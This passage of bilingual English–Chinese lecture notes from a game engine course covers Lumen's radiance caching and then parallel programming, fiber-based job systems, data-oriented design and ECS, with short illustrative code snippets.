}

    Denoise: Gather Radiance from neighbors

    降噪:从邻居那里收集辐射

Gather radiance from matching octahedral cells in neighboring probes

从相邻探针中匹配的八面体单元收集辐射

Error weighting:

误差加权:

• Angle error from reprojected neighbor ray hits (less than 10 degrees)

  重投影的相邻光线命中点的角度误差(小于 10 度)

    • Filters distant lighting, preserves local shadowing

      过滤远距离照明,保留局部阴影

    webp

    webp

Clamp Distance Mismatching

钳制不匹配的命中距离

Angle error biases toward distant light = leaking

角度误差偏向远处光源 = 泄漏

• Distant light has no parallax and never gets rejected

  远处光源没有视差,永远不会被剔除

    Solution: clamp neighbor hit distance to our own before reprojection

    解决方案:在重新投影之前,将邻居的击中距离限制在我们自己的距离

    webp

    webp

    World Space Probes and Ray Connecting

    世界空间探测器和射线连接

    World Space Radiance Cache

    世界空间辐射缓存

    Problem: distant lighting

    问题:远距离照明

    • Noise from small bright feature increases with distance

      小亮特征的噪声随着距离的增加而增加

    • Long incoherent traces are slow

  又长又不连贯的追踪很慢

    • Distant lighting is changing slowly -opportunity to cache

      远距离照明变化缓慢——缓存机会

    • Redundant operations for nearby Screen Probes

      附近屏幕探头的冗余操作

    Solution: separate sampling for distant Radiance

    解决方案:对远距离辐射进行单独采样

    • World space Radiance Caching for distant lighting

      用于远距离照明的世界空间辐射缓存

• Stable error since it lives in world space - easy to hide

  误差在世界空间中是稳定的——容易隐藏

    webp

    Placement

    • 4 level clipmaps around camera

      相机周围的 4 级 clipmap

    • default resolution is 48^3

      默认分辨率为 48^3

• clipmap0 size is 50m^3

  clipmap0 的大小为 50m^3

    Radiance

• A 32 x 32 atlas tile per probe

  每个探针在图集中占 32 x 32 的区域

    webp

    Connecting rays

    连接射线

    • How to connect Screen Probe ray and World Probe ray

      如何连接 Screen Probe ray 和 World Probe ray

    webp

    • World Probe ray must skip the interpolation footprint

      World Probe 射线必须跳过插值足迹

    webp

    • Screen Probe ray must cover interpolation footprint + skipped distance

      屏幕探测光线必须覆盖插值足迹 + 跳过距离

    webp

    • Problem: leaking!

      问题:泄漏!

    • World probe radiance should have been occluded

      世界探测器的辐射应该被遮挡了

  • But wasn't, due to incorrect parallax

    但由于视差不正确而没有被遮挡

    webp

    • Solution: simple sphere parallax

      解决方案:简单球面视差

    • Reproject Screen Probe ray intersection with World Probe sphere

      重新投影屏幕探头射线与 World Probe 球体的交点

    webp

    Placement and caching

    放置和缓存

• Mark any position that we will interpolate from later in the clipmap indirections

  在 clipmap 间接表中标记稍后将用于插值的所有位置

    • For each marked world probe:

      对于每个标记的世界探测器:

      • Reuse traces from last frame, or allocate new probe index

        重用上一帧的跟踪,或分配新的探测索引

      • Re-trace a subset of cache hits to propagate lighting changes

        重新跟踪缓存命中的子集以传播照明变化

    webp

Place Probes → Reuse existing probe traces → Generate rays → Trace → Probe space filtering

放置探针 → 重用已有的探针追踪结果 → 生成射线 → 追踪 → 探针空间滤波

    • Without World Space Probes

      没有世界空间探针

    webp

• Screen Radiance Cache for the first 2 meters

      前 2 米的屏幕辐射缓存

    • World Radiance Cache for any lighting further than that.

      World Radiance Cache 适用于任何超出此范围的照明。

    webp

    Phase 4 : Shading Full Pixels with Screen Space Probes

    阶段 4:使用屏幕空间探测器对全像素进行着色

    Convert Probe Radiance to 3rd order Spherical Harmonic:

    将探头辐射转换为三阶球面谐波:

    • SH is calculated per Screen Probe

      SH 按屏幕探头计算

    • Full res pixels load SH coherently

      全分辨率像素相干加载 SH

• SH diffuse integration is cheap and high quality

  SH 漫反射积分开销低、质量高

    webp
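For reference, a minimal sketch of the diffuse SH integration (standard 3rd-order real SH with the usual cosine-lobe convolution constants; this is illustrative math, not Lumen source):

struct Sh9 { float C[9]; };

// Diffuse lighting at a pixel from a probe's 9-coefficient radiance SH,
// evaluated for a unit normal (X, Y, Z).
float ShDiffuse(const Sh9& Radiance, float X, float Y, float Z)
{
    // Real SH basis evaluated at the normal.
    float B[9] = {
        0.282095f,
        0.488603f * Y, 0.488603f * Z, 0.488603f * X,
        1.092548f * X * Y, 1.092548f * Y * Z,
        0.315392f * (3.0f * Z * Z - 1.0f),
        1.092548f * X * Z, 0.546274f * (X * X - Y * Y)
    };
    // Cosine-lobe convolution weights per band, already divided by pi
    // for the Lambertian BRDF: {A0, A1, A2} / pi = {1, 2/3, 1/4}.
    const float A[3] = { 1.0f, 2.0f / 3.0f, 0.25f };
    float Result = 0.0f;
    for (int i = 0; i < 9; ++i)
    {
        int Band = (i == 0) ? 0 : (i < 4 ? 1 : 2);
        Result += A[Band] * Radiance.C[i] * B[i];
    }
    return Result;
}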

Importance sample the BRDF to get ray directions, then sample the Radiance Cache.

    对 BRDF 进行重要性采样以获取光线方向,然后对辐射缓存进行采样。

    Final integration with SH

    与 SH 的最终整合

    webp

    Overall, Performance and Result

    总体、性能和结果

    Speed of Different Tracing Methods

    不同追踪方法的速度

    webp

    Red–Screen Space Trace 红色-屏幕空间轨迹

    fail to hit 未能命中↓

    Green–Mesh SDF Trace 绿色–网格 SDF 轨迹

    fail to hit 未能命中↓

Blue–Global SDF Trace 蓝色–全局 SDF 追踪

    webp

    webp

    webp

    webp

The right side shows the result with SSGI enabled.

    Performance

    性能

    Playstation 5

    1080p internal resolution

    1080p 内部分辨率

    Temporal Super Resolution to 4k

    时间超分辨率 4k

    webp

    webp

    webp

    webp

    webp

    webp

    Conclusion

    结论

    Complexity of Real Rendering

    webp

$$L_o(x,\omega_o)=L_e(x,\omega_o)+\int_{H^2}f_r(x,\omega_o,\omega_i)\,L_i(x,\omega_i)\cos\theta_i\,\mathrm{d}\omega_i$$

This one equation can, in principle, solve every rendering problem; in practice, real applications must trade accuracy against performance.

    References

    参考

    Monte Carlo Integration

    GI

    Hardware Ray Tracing

    Signed Distance Field

资源

    课程

    第二十节:现代游戏引擎架构:面向数据编程与任务系统

    Code Execution Is Not As Simple As It Looks

    代码执行并不像看起来那么简单

    Code is executed on top of specific hardware and operating system

    代码在特定硬件和操作系统上执行

    • Hardware and OS must be considered if we want to write a high performance program

      如果我们想编写高性能程序,就必须考虑硬件和操作系统

    webp

    Basics of Parallel Programming

    并行程序设计基础

    Ceiling of Moore’s Law and Multi-Cores

    摩尔定律的上限与多核

    • The number of transistors in a dense integrated circuit (IC) doubles about every two years

      密集集成电路(IC)中的晶体管数量大约每两年翻一番

• In these years, chip densities are no longer doubling every two years

      这些年来,芯片密度不再每两年翻一番

• Multi-core processors become the new industry trend

  多核处理器成为新的行业趋势

    webp

Gains in processor frequency have hit a ceiling, so adding more cores has become the trend for scaling processor performance.

    Process and Thread

    进程和线程

    Process

    进程

    • The instance of an application (or program)

      应用程序(或程序)的实例

    • Has its own individual region of memory

      有自己的内存空间

    Thread

    线程

• Preemptive multitasking

  抢占式多任务处理

    • The smallest unit of task that can be scheduled by OS

      操作系统可以调度的最小任务单元

    • Must reside in a process

      必须驻留在进程中

    • Threads in the same process share the same region of memory

      同一进程中的线程共享同一内存区域(处理不好容易出 bug)

    webp

    Types of Multitasking

    多任务处理的类型

    webp

Preemptive Multitasking

抢占式多任务处理

    • Currently executing task can be interrupted at a time decided by the scheduler

      当前正在执行的任务可以在调度程序决定的时间中断

    • Scheduler determines which task to be executed next

      调度器确定下一个要执行的任务

    • Applied in most operating systems

      适用于大多数操作系统

    webp

    Non-preemptive Multitasking

    非抢占式多任务处理

• Tasks must be explicitly programmed to yield control

  任务必须显式编程以让出控制权

• Tasks must cooperate for the scheduling scheme to work

      任务必须配合调度方案才能发挥作用

    • Currently many real-time operating systems (RTOS) also support this kind of scheduling

      目前,许多实时操作系统(RTOS)也支持这种调度

    Thread Context Switch

    线程上下文切换

    Store the state of a thread and resume the execution at a later point

    存储线程的状态,并在稍后恢复执行

    • State including registers, stack and other OS required data

      状态,包括寄存器、堆栈和其他操作系统所需的数据

    • Thread context switch implies extra user-kernel mode switch

      线程上下文切换意味着额外的用户内核模式切换

    • Cache invalidation after context switch has even more cost

      上下文切换后缓存失效的成本更高

    webp

Cache invalidation may take 10,000~1,000,000 cycles

    缓存失效可能需要 10000~1000000 个周期

    Parallel Problems in Parallel Computing

    并行计算中的并行问题

Embarrassingly Parallel Problem (or Perfectly Parallel)

易并行问题(或完全并行问题)

    • Little or no dependency or need for communication between parallel tasks

      并行任务之间很少或不需要通信

    webp

    Monte Carlo algorithm is a typical example of embarrassingly parallel

    蒙特卡洛算法是易并行计算问题的典型例子(使用多线程计算蒙特卡洛积分)

Non-embarrassingly Parallel Problem

非易并行问题

    • Communication is needed between parallel tasks

      并行任务之间需要通信

    webp

    Data Race in Parallel Programming

    并行编程中的数据竞争

    Multiple threads in a single process access the same memory location concurrently

    单个进程中的多个线程同时访问同一内存位置

• At least one of the accesses is a write

  至少有一次访问是写操作

while (job_count < 100)
{
    doSomething();
    job_count++;
}

• Read job_count

  读取 job_count

• Compute job_count + 1

  计算 job_count + 1

• Write new job_count

  写入新的 job_count

    webp

Blocking Algorithm - Locking Primitives

阻塞算法——锁原语

    Lock

    • Only one thread can acquire the lock at a time

      一次只能有一个线程获取锁

• Make a critical section for shared resource access

  为共享资源的访问建立临界区

    webp

Only one thread can execute this part of the code at a time

同一时间只有一个线程可以执行这段代码
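A minimal C++ sketch of such a critical section (names are illustrative):

#include <mutex>

std::mutex JobMutex;
int JobCount = 0;

void DoOneJob()
{
    std::lock_guard<std::mutex> Lock(JobMutex); // acquire; released on scope exit
    ++JobCount;                                 // shared state touched only under the lock
}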

    Other Issues with Locks

    锁的其他问题

    • Thread suspending and resuming will bring performance overhead

      线程挂起和恢复将带来性能开销

• Suspended threads never get resumed if the thread that acquired the lock exits abnormally

      如果获取锁的线程异常退出,则挂起的线程永远不会恢复

    • Priority Inversion

      优先级反转

      • A higher priority task attempts to acquire the lock that is already acquired by a lower priority task

        较高优先级的任务试图获取较低优先级任务已经获取的锁

    webp

    Atomic Operation : Lock-free Programming

    原子操作:无锁编程

    Atomic Loads and Stores

    原子负载和存储

    • Load: Load data from shared memory to either a register or thread-specific memory

      加载:将数据从共享内存加载到寄存器或线程特定内存

    • Store: Move data into shared memory

      存储:将数据移动到共享内存中

    Atomic Read-Modify-Write (RMW)

    原子读修改写(RMW)

• Test-and-Set: write 1 to shared memory and return the previous value

  测试并设置:向共享内存写入 1,并返回先前的值

• Compare-and-Swap (CAS): update the data in shared memory if it equals an expected value

  比较并交换(CAS):如果共享内存中的数据等于预期值,则更新该数据

    • Fetch and Add: Add a value to the data in shared memory and return the previous value

      提取并添加:向共享内存中的数据添加一个值,并返回上一个值

    webp

C++11 and C++20 provide standard support for atomic operations.
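As a minimal C++ sketch (not from the slides), rewriting the racy job_count loop with std::atomic turns the increment into an atomic read-modify-write, so no update can be lost:

#include <atomic>
#include <cstdio>
#include <thread>

std::atomic<int> JobCount{0};

void Worker()
{
    for (int i = 0; i < 100000; ++i)
        JobCount.fetch_add(1, std::memory_order_relaxed); // atomic RMW
}

int main()
{
    std::thread A(Worker), B(Worker);
    A.join(); B.join();
    std::printf("%d\n", JobCount.load()); // always 200000, unlike the racy version
    return 0;
}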

    Lock Free vs. Wait Free

    webp

• Wait-free: no matter how the OS schedules threads, every thread is always doing useful work.

• Lock-free: no matter how the OS schedules threads, at least one thread is doing useful work.

    Compiler Reordering Optimizations

    编译器重新排序优化

    webp

When the compiler lowers a high-level language to assembly, it may reorder code as an optimization. This changes nothing for a single thread, but it can produce strange behavior across multiple threads.

    Problem of Memory Reordering

    内存重新排序问题

    • Compilers and CPUs often modify the execution order of instructions to optimize performance

      编译器和 CPU 经常修改指令的执行顺序以优化性能

    • It’s the hard part of parallel programming

      这是并行编程的难点

    webp

assert is a C/C++ macro that checks a condition at runtime; if the condition is false, the program aborts and prints an error message.

If the compiler reorders Thread 1, Thread 2 may not raise an error at assert(a==2);.

Out-of-order Execution by CPUs

CPU 的乱序执行

For different CPUs

对于不同的 CPU

    • The optimization strategy are significantly different

      优化策略明显不同

    • Provides different types of memory order guarantees

      提供不同类型的内存顺序保证

    • Parallel programs require different processing

      并行程序需要不同的处理

    webp

Some CPUs do not guarantee execution order, so the same code may run fine on platform A yet misbehave on platform B.

    Parallel Framework of Game Engine

    游戏引擎的并行框架

    Fixed Multi-thread

    固定多线程

    One fixed thread for each part of the game engine logic

    游戏引擎逻辑的每个部分都有一个固定线程

    • Render, Simulation, Logic, Network, and etc.

      渲染、模拟、逻辑、网络等

    • Easy to implement

      易于实施

    webp

Issues with Fixed Multi-thread

固定多线程的问题

    • The workload is unbalanced among threads (cores)

      线程(核心)之间的工作负载不平衡

• Doesn't scale as processor core counts grow

  无法随处理器核心数的增长而扩展

    webp

Some cores still end up mostly idle, just along for the ride.

Thread Fork-Join

线程 Fork-Join

Fork-join for data-parallelizable work (based on fixed multi-thread)

用于可数据并行的工作的 Fork-Join(基于固定多线程)

    • Use a thread pool to prevent frequent thread creation/destruction

      使用线程池来防止频繁的线程创建/销毁

    webp

Problems with Thread Fork-Join

线程 Fork-Join 的问题

• Not easy for logic programmers (work split, work threads count)

  对逻辑程序员不友好(如何拆分工作、开多少工作线程)

    • Too many threads can bring performance overhead on context switch

      太多的线程会给上下文切换带来性能开销

    • The workload is still unbalanced among threads (cores)

      线程(核心)之间的工作负载仍然不平衡

    webp

    Unreal Parallel framework

    虚幻并行框架

Two types of threads

两种类型的线程

    • Named Thread

      命名线程

      • Created by other systems and attached to parallel framework

        由其他系统创建并附加到并行框架

• Worker Thread

  工作线程

  • Three priorities: high, middle and low

    三种优先级:高、中、低

      • The number is determined by the number of CPU cores

        该数量由 CPU 内核的数量决定

    webp

    Taskgraph

    任务图

    A directed acyclic graph

    有向无环图

    • Node→Task

      节点→任务

    • Edge→Dependency

      边缘→依赖

    webp

Task graphs are built by linking tasks together.

    webp

    Job System

    任务系统

    Coroutine

    协程

Allows for multitasking by creating jobs that run inside of coroutines

    通过创建在协程内运行的任务,允许多任务处理

    • Coroutine is a lightweight execution context (include a user provided stack, registers…)

      协程是一个轻量级的执行上下文(包括用户提供的堆栈、寄存器等)

• Execution is cooperative, meaning a coroutine can explicitly switch to another

  执行是协作式的,协程可以显式地切换到另一个协程

    webp

    Coroutine vs. Thread

    webp

    Coroutine

    协程

    • Scheduled by programmers

      由程序员安排

    • To be executed within a thread

      在线程内执行

    • Context switch is faster without kernel switch

      无需内核切换,上下文切换速度更快

    Thread

    线程

• Scheduled by operating system

  由操作系统调度

• Resides in a process

  驻留在进程中

    • Context switch is costly with kernel switch

      内核切换的上下文切换成本很高

Stackful Coroutine

有栈协程

Coroutine owns an independent runtime stack which is reserved after yield

协程拥有独立的运行时栈,yield 之后依然保留

• Can yield from within a nested stack frame

  可以在嵌套的栈帧内 yield

    • Use local variables just like normal functions

      像普通函数一样使用局部变量

    webp

In C++, yield() is mostly used in multithreaded code to give up the current thread's execution slot. What it does exactly depends on the threading library or framework. Common cases:

1. std::this_thread::yield() (C++11 and later):

  • A standard library function declared in the <thread> header.

  • std::this_thread::yield() pauses the current thread and lets other threads of equal priority run. It is typically used to optimize resource usage in multithreaded code, especially in busy-wait loops.

  • Example:

    #include <iostream>
    #include <thread>

    void worker() {
        for (int i = 0; i < 10; ++i) {
            std::cout << "Working...\n";
            std::this_thread::yield(); // give up the current time slice
        }
    }

    int main() {
        std::thread t(worker);
        t.join();
        return 0;
    }

2. std::experimental::coroutine_handle::yield_value() (C++20 coroutines):

  • C++20 coroutines introduce a richer mechanism, such as yield_value(), for suspending and resuming a coroutine.

  • This allows execution to be suspended inside a coroutine and resumed later, providing more advanced control flow.

Note that yield() does not block the current thread; it merely hints to the scheduler that the thread is willing to pause. The scheduler decides whether to actually suspend the thread and when to resume it; yield() is only a suggestion, and the concrete behavior depends on the OS scheduling policy.

Overall, yield() helps multithreaded programs use resources efficiently and stay responsive.

Stackless Coroutine

无栈协程

Coroutine has no independent runtime stack to be reserved when it yields

协程在 yield 时没有需要保留的独立运行时栈

• Only the top-level routine may yield (without a stack, subroutines have no idea where to return)

  只有顶层例程可以 yield(没有栈,子例程不知道该返回到哪里)

    • The data that is required to resume execution should be stored separately from the stack

      恢复执行所需的数据应与堆栈分开存储

    webp

Stackful vs. Stackless Coroutine

有栈协程 vs. 无栈协程

Stackful Coroutine

有栈协程

• More powerful: can yield from within a nested stack frame

  更强大:可以在嵌套的栈帧内 yield

• Needs more memory to reserve stacks for each coroutine

  需要更多内存为每个协程保留栈

• Coroutine context switch takes more time

  协程的上下文切换耗时更多

Stackless Coroutine

无栈协程

• Unable to yield from within a subroutine

  无法在子例程中 yield

    • More difficult to use without a stack to reserve data

      如果没有堆栈来保留数据,则更难使用

    • No extra memory needed for coroutine’s stack

      协程堆栈不需要额外的内存

    • Faster context switch

      更快的上下文切换

Fiber-based Job System

基于纤程(Fiber)的任务系统

Allows for multitasking by creating jobs instead of threads

通过创建任务而不是线程来实现多任务处理

• A fiber is like a coroutine, except that fibers are scheduled by a scheduler

  纤程类似于协程,只是纤程由调度器调度

• Thread is the execution unit while fiber is the context

  线程是执行单元,纤程是上下文

  • One thread for each processor core to minimize the context switch overhead

    每个处理器核心一个线程,以最大限度地减少上下文切换开销

• Job is executed within the context of a fiber

  任务在纤程的上下文中执行

    webp

    One Work Thread for One Core

    一个核心对应一个工作线程

    To minimize the overhead of thread context switch

    尽量减少线程上下文切换的开销

    • Multiple work threads for a single core still suffers from context switch

      单个核心的多个工作线程仍然受到上下文切换的影响

    • One work thread for each core eliminates context switch

      每个核心都有一个工作线程,消除了上下文切换

    webp

Fiber-based Job System

基于纤程(Fiber)的任务系统

• Thread is the execution unit while fiber is the context

  线程是执行单元,纤程是上下文

• Job is executed within a fiber

  任务在纤程内执行

    webp

Job Scheduler - Global Job

    LIFO and FIFO Mode

    LIFO 和 FIFO 模式

    • Schedule Model

      计划模型

      • First In First Out (FIFO)

        先进先出(FIFO)

      • Last In First Out (LIFO)

        后进先出(LIFO)

    • LIFO Mode

  • In most cases, job dependencies are tree-like

    在大多数情况下,任务依赖是树状的

  • Some systems add jobs occasionally but wait on them immediately

    有些系统偶尔会添加任务,但会立即等待这些任务

Job Scheduler - Job Dependency

Job Scheduler - Job Stealing

    Pros and Cons of Job System

    Pros

    • Easy to implement task schedule

      易于实施的任务计划

    • Easy to handle task dependency

      易于处理任务依赖关系

    • Job stack is isolated

      任务堆栈是隔离的

• Avoid frequent context switches

  避免频繁的上下文切换

    Cons

    • C++ does not natively support fiber

      C++ 本身不支持光纤

    • Implementation is different between OS

      操作系统之间的实现不同

    • Has some restrictions (thread_local invalid)

      有一些限制(thread_local 无效)

    Programming Paradigms

    编程范式

    Procedure-oriented Programming

    面向过程的程序设计

    Object-oriented Programming

    面向对象程序设计

    Programming Paradigm of Game Engine

    游戏引擎的编程范式

    • There are many different programming paradigms

      有许多不同的编程范式

• In practice, some paradigms are widely used

      在实践中,一些范式被广泛使用

    • Programming languages aren’t always tied to a specific paradigm

      编程语言并不总是与特定的范式联系在一起

    webp

    Procedural Oriented Programming (POP)

    面向过程编程(POP)

    • Follows a step-by-step approach to break down a task into a collection of variables and routines (or subroutines) through a sequence of instructions

      遵循循序渐进的方法,通过一系列指令将任务分解为变量和例程(或子程序)的集合

    • Impossible to write a game engine in this way

      无法以这种方式编写游戏引擎

      • Data is not well maintained.

        数据没有得到很好的维护。

• A correlation with real-world objects is difficult

        与现实世界中的物体建立关联是困难的

    Object-Oriented Programming (OOP)

    面向对象程序设计(OOP)

• Based on the concept of “objects”, which can contain data and code

  基于“对象”的概念,对象可以包含数据和代码

    • It’s natural for human to abstract from real world in an object-oriented way

      人类以面向对象的方式从现实世界中抽象出来是很自然的

    webp

    Problems of OOP : Where to Put Codes?

    面向对象编程的问题:把代码放在哪里?

    webp

When an attacker hits a target, should the code run Attacker.doDamageTo() or Victim.receiveDamage()?

When the player touches an enemy, should it call Player.attachTo() or Enemy.isAttached()?

Problems of OOP : Method Scattering in Inheritance Tree

    面向对象程序的问题:继承树中的方法分散

    • Hard to know which parent class has the method implementation

      很难知道哪个父类有方法实现

    webp

To find the logic where the player attacks an enemy, you may have to dig through several layers of the inheritance tree before locating the code.

Problems of OOP : Messy Base Class

面向对象编程的问题:混乱的基类

class ENGINE_API AActor : public UObject
{
    ...
    const FTransform& GetTransform() const;
    const FTransform& ActorToWorld() const;
    FVector GetActorForwardVector() const;
    FVector GetActorUpVector() const;
    FVector GetActorRightVector() const;
    virtual void GetActorBounds(...) const;
    virtual FVector GetVelocity() const;
    float GetDistanceTo(const AActor* OtherActor) const;
    virtual void SetActorHiddenInGame(bool bNewHidden);
    bool GetActorEnableCollision() const;
    bool HasAuthority() const;
    UActorComponent* AddComponent(...);
    void AttachToActor(...);
    void DetachFromActor(const FDetachmentTransformRules& DetachmentRules);
    bool GetTickableWhenPaused();
    bool IsActorInitialized() const;
    void ReceiveAnyDamage(...);
    void GetOverlappingActors(...) const;
    virtual void SetLifeSpan(float InLifespan);
    virtual void Serialize(FArchive& Ar) override;
    virtual void PostLoad() override;
    ...
};

    Parts of methods of a “messy base class”

    “混乱的基层”的部分方法(代码可读性差)

Find some methods in common? Put them in the base class! → We get a messy base class

发现一些公共方法?把它们放进基类!→ 于是我们得到了一个混乱的基类

    This is not the best OO design, and it certainly is possible to make a better one.
    But also, often code ends up being like this, even if no one wanted it that way.

    这不是最好的 OO 设计,当然有可能做出更好的 OO 设计。
    但是,即使没有人希望这样,代码最终也往往是这样的。

    Problems of OOP : Performance

    面向对象编程的问题:性能

• Memory scattering

  内存散布

• Jungle of virtual functions

  虚函数丛林

    webp

Object-oriented code tends to scatter objects across the address space at runtime, which lowers the cache hit rate and hurts performance.

    Problems of OOP : Testability

    面向对象编程的问题:可测试性

    • Unit Testing

      单元测试

      • OO designs often need a lot of setup to test

        OO 设计通常需要大量的设置来测试

    webp

    Data-Oriented Programming (DOP)

    面向数据编程(DOP)

    Processor-Memory Performance Gap

    处理器内存性能差距

• Performance of memory grows much more slowly than that of processors

  内存性能的增长速度远慢于处理器

• The gap keeps widening, which makes memory the main performance bottleneck

  差距越来越大,使内存成为性能的主要瓶颈

    webp

The Evolution of Memory - Cache

内存的演变——缓存

    Add cache to speed up data reading

    添加缓存以加快数据读取速度

    • L1: Ranges between 256KB to no more than 1MB, but even that is sufficient.

      L1:范围在 256KB 到不超过 1MB 之间,但即使这样也足够了。

    • L2: Usually a few megabytes and can go up to 10MB.

      L2:通常为几兆字节,最高可达 10MB。

    • L3: Larger than L1 and L2, varies from 16MB to 64MB, shared between all cores.

      L3:大于 L1 和 L2,大小从 16MB 到 64MB 不等,在所有内核之间共享。

    webp

    Principle of Locality

    地方性原则

    the tendency of a processor to access the same set of memory locations repetitively over a short period of time

    处理器在短时间内重复访问同一组存储位置的趋势

    Spatial Locality

    空间位置

    • The use of data elements within relatively close storage locations

      在相对较近的存储位置内使用数据元素

    webp

    Single instruction multiple data (SIMD)

    单指令多数据(SIMD)

    webp

    LRU (Least Recently Used)

    LRU(最近最少使用)

    • When cache is full, discards the least recently usedcache-linefirst.

      当缓存已满时,首先丢弃最近最少使用的缓存行。

      • Record the “used time” of each cache line

        记录每个缓存行的“使用时间”

      • Discard the most “oldest used” cache lineeach time

        每次丢弃“最旧的已使用”缓存行

      • Update “used time” when access data of cache line

        访问缓存行数据时更新“已用时间”

    webp

    Cache Line

    缓存行

    • Data is transferred between memory and cache inblocks of fixed size (typically 64 bytes), called cache lines or cache blocks.

      数据在固定大小(通常为 64 字节)的内存和缓存块之间传输,称为缓存行或缓存块。

    • A cache can only hold a limited number of lines, determined by the cache size. For example, a 64 kilobyte cache with 64-byte lines has 1024 cache lines.

      缓存只能容纳有限数量的行,由缓存大小决定。例如,具有 64 字节行的 64KB 缓存有 1024 条缓存行。

    • Every time you load any memory at all, you are loading in a full cache line of bytes

      每次加载任何内存时,都会加载一个完整的字节缓存行

    Cache Miss

    未命中缓存

    webp

    • When cahce is full (loaded 4 rows), new rows will replace the oldest one

      当 cahce 已满(加载 4 行)时,新行将替换最旧的行

    • When a elements not in cache, a whole row will be loaded

      当一个元素不在缓存中时,将加载整行

    Data-Oriented Programming (DOP)

    面向数据编程(DOP)

    1. Datais all we have

    ​我们只有数据

    webp

    ​示例:假设你正在开发一个游戏,并需要处理大量的游戏实体(例如玩家、敌人、NPC 等)。

    ​在面向对象编程(OOP)中,你可能会为每种实体创建一个类,并将属性和方法打包在一起:

    pythonCopy Codeclass Player:
    def __init__(self, x, y):
    self.x = x
    self.y = y

    def move(self, dx, dy):
    self.x += dx
    self.y += dy

    ​而在面向数据编程(DOP)中,你会将实体的属性分开存储,并编写独立的函数来操作这些属性:

    pythonCopy Code  # 使用列表存储所有玩家的位置数据
    player_positions = [(0, 0), (5, 5), (10, 10)]

    def move_player(index, dx, dy):
    x, y = player_positions[index]
    player_positions[index] = (x + dx, y + dy)

    # 移动第一个玩家
    move_player(0, 1, 1)

    ​在这个例子中,player_positions 列表存储所有玩家的位置数据。move_player 函数则直接操作这些数据,不涉及复杂的对象方法。这种方式可以提高性能,尤其是在处理大量数据时,因为它减少了对象的开销,并且更容易进行批量操作和并行处理。

    Instructions are Data Too

    指令也是数据

    webp

    ​Code 和 Data 都是内存中的数据。

    Keep Code and Data Tight in Memory

    保持代码和数据在内存中的紧密性

    • Keep both code and data small and process in bursts when you can

      尽可能保持代码和数据的小规模,并以突发的方式处理

    webp

    Performance-Sensitive Programming

    性能敏感编程

    Reducing Order Dependency

    减少订单依赖

    • The work being done because of a misprediction will have to be undone

      由于预测失误而完成的任务将不得不撤销

    • Never modify variables once they are initially assigned

      一旦变量最初被赋值,就永远不要修改它们

    webp

    These 2 parts of code will not be excuted in parallel

    这两部分代码不会并行执行

    because variables a & b is used before

    因为之前使用了变量 a 和 b

    webp

    Compiler allow these 2 parts of code to execute in parallel

    编译器允许这两部分代码并行执行

    Actually, compiler use static single-assignment (SSA) to deal with simple situation like this

    实际上,编译器使用静态单赋值(SSA)来处理这样的简单情况

    False Sharing in Cache Line

    缓存行中的错误共享

    • Ensuring any rapidly updated variables are kept local to the thread

      确保任何快速更新的变量都保持在线程的本地

    • Cache contension

      缓存争议

    webp

    Branch prediction

    分支预测

    • CPU will prefetch instructions and data ahead

      CPU 将提前预取指令和数据

    • Use branch prediction technics to decide what to prefetch

      使用分支预测技术来决定预取什么

    webp

    • To avoid branch mis-prediction

      避免分支预测错误

    int a[10] = {2, 5, 8, 11, 3, 12, 9, 22, 5, 13};
    for(int i = 0; i < 10; i++)
    {
    if(a[i] > 10)
    {
    doFunc1();
    }
    else
    {
    doFunc2();
    }
    }

    webp

    ​如果代码跳着执行,则 Cache 容易未命中,降低运行速度。

    int a[10] = {2, 3, 5, 5, 8, 9, 11, 12, 13, 22};
    for(int i = 0; i< 10; i++)
    {
    if(a[i] > 10)
    {
    doFunc1();
    }
    else
    {
    doFunc2();
    }
    }

    webp

    ​如果事先将序列排序好,代码就不会跳着执行。

    Existential Processing

    存在加工

    for actor in actor_array do
    if actor is alive then
    aliveFunc(actor)
    else
    deadFunc(actor)
    end
    end

    This code also faces branch prediction problems

    此代码还面临分支预测问题

    Unlike the example before, actor_array changes every tick

    与前面的示例不同,actor_array 每一刻都会发生变化

    for actor in alive_actor_array do
    aliveFunc(actor)
    end

    for actor in dead_actor_array do
    deadFunc(actor)
    end

    Completely avoid “if-else”

    完全避免“if-else”

    By maintaining 2 lists of different actors, we could avoid branch mis-precondition

    通过维护 2 个不同参与者的列表,我们可以避免分支预处理错误

    Performance-Sensitive Data Arrangements

    性能敏感数据安排

    Reducing Memory Dependency

    减少内存依赖

    • (chained memory lookups/accesses by pointers)

    (通过指针进行链式内存查找 / 访问)

    webp

    • Load the first cache line 1

      加载第一个缓存行 1

    • Get the next node address

      获取下一个节点地址

    • Cache miss

      缓存未命中

    • Unload the old one, and load another cahce line 2

      卸下旧的,再加载另一个 Cache 线 2

    • Repeating

      重复

    Array of Structure vs. Structure of Array

    数组的结构与结构的数组

    webp

    webp

    ​SOA 的地址排列要比 AOS 更连续。

    If we want to read the position of all particles, SOA has better performance

    如果我们想读取所有 particles 的位置,SOA 的性能更好。

    Entity Component System (ECS)

    实体组件系统(ECS)

    Recap: Component-based Design

    回顾:基于组件的设计

    webp

    • Code example

      代码示例

    webp

    Entity Component System (ECS)

    实体组件系统(ECS)

    A pattern to structure game code in a data-oriented way for maximum performance

    一种以面向数据的方式构建游戏代码以获得最大性能的模式

    • Entity: an ID refer to a set of components

      实体:ID 指一组组件

    • Component: the data to be processed by systems, no logic at all

      组件:系统要处理的数据,根本没有逻辑

    • System: where the logic happens, read/write component data

      系统:逻辑发生的地方,读/写组件数据

    webp

    Unity Data-Oriented Tech Stack (DOTS)

    面向 Unity 数据的技术栈(DOTS)

    A combination of technologies that work together to deliver a data-oriented approach to coding

    结合多种技术,共同提供面向数据的编码方法

    • The Entity Component System (ECS) provides data-oriented programming framework

      **实体组件系统(ECS)**提供面向数据的编程框架

    • The C# Job System provides a simple method of generating multithreaded code

      C# 任务系统提供了一种生成多线程代码的简单方法

    • The Burst Compiler generates fast and optimized native code

      Burst 编译器生成快速且优化的本机代码

    webp

    Unity ECS – Archetype

    A specific combination of components

    Archetype 是组件的特定组合

    • Entities are grouped into archetypes

      实体被分组到 archetype 中

    webp

    Unity ECS –Data Layout in Archetype

    Unity ECS——Archetype 中的数据布局

    Same components in an archetype are packed tightly into chunks for cache friendliness

    原型中的相同组件被紧密地打包成块,以便于缓存

    • A chunk is a block of memory with fixed size, i.e. 16KB

      块是固定大小的内存块,即 16KB

    webp

    Unity ECS –System

    Unity ECS——系统

    webp

    public class MoveSystem: SystemBase
    {
    protected override void OnUpdate()
    {
    // For each entity which has Translation and Velocity
    Entities.ForEach(
    // Write to Displacement (ref), read Velocity (in)
    (refTranslationtrans, inVelocityvelocity) =>
    {
